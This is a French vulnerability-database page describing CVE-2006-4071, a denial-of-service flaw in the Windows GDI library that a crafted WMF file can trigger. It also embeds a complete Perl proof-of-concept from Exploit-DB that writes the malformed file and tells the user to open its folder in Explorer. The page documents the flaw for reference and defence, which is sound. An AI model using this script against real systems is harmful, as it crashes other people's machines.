CVE-2006-4071 : Détail

CVE-2006-4071

22.39%V4
Network
2006-08-09
23h00 +00:00
2018-10-17
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3111

Date de publication : 2007-01-12 23h00 +00:00
Auteur : cyanid-E
EDB Vérifié : Yes

#!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>"; print "\n\ngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf file\n"; print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00"; print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00"; print WMF "\x00\x00\x00\x00"; close(WMF); print "ok\n\nnow try to browse folder in XP explorer and wait :)\n"; # milw0rm.com [2007-01-13]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_2003_server >> Version sp1

      Microsoft>>Windows_xp >> Version *

      Microsoft>>Windows_xp >> Version *

      Microsoft>>Windows_xp >> Version *

      Références

      http://www.securityfocus.com/bid/19365
      Tags : vdb-entry, x_refsource_BID
      https://www.exploit-db.com/exploits/3111
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://www.vupen.com/english/advisories/2006/3180
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/21377
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://securityreason.com/securityalert/1353
      Tags : third-party-advisory, x_refsource_SREASON
      http://www.securityfocus.com/bid/21992
      Tags : vdb-entry, x_refsource_BID